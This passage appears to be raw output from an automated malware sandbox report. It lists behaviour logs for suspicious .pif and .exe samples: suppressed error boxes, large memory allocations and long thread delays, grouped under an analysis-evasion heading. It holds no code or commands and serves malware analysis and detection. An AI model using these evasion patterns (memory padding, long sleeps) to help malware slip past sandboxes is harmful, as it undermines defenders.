Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2850000 memory commit 500064256
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2851000 memory commit 500154368
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2876000 memory commit 500002816
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2877000 memory commit 500068352
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2887000 memory commit 501014528
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 297F000 memory commit 500006912
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2980000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 29C0000 memory commit 500064256	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 29C1000 memory commit 500154368	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 29E6000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 29E7000 memory commit 500068352	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 29F7000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2AEF000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2AF0000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2890000 memory commit 500064256	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 2891000 memory commit 500154368	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 28B6000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 28B7000 memory commit 500068352	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 28C7000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 29BF000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: 29C0000 memory commit 500015104	Jump to behavior

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 1CF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 1D2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 1D1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 21920000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 21D90000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 21A20000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 30D00000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 310F0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Memory allocated: 30F10000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\fptrsiaN.pif

6_2_004019F0

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599541	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599396	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599224	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596682	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594861	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594368	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594242	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594132	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593799	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593503	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593306	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593168	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593034	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592787	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592648	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592506	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592315	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592000	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591878	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591741	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591617	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591362	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599829
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599701
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599583
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599462
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599350
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599237
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599016
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598872
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598725
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598591
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598443
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598284
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598052
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597199
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597035
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596755
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596605
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596404
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596252
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596134
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595992
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595856
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595672
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595300
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595176
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594804
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594691
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594192
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593692
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593192
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592704
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592191
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591692
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591301
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591176
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591051
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590926
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590801
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590676
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590551
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598905
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598787
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598671
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598562
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598015
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597906
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597771
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597656
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597546
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597437
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597319
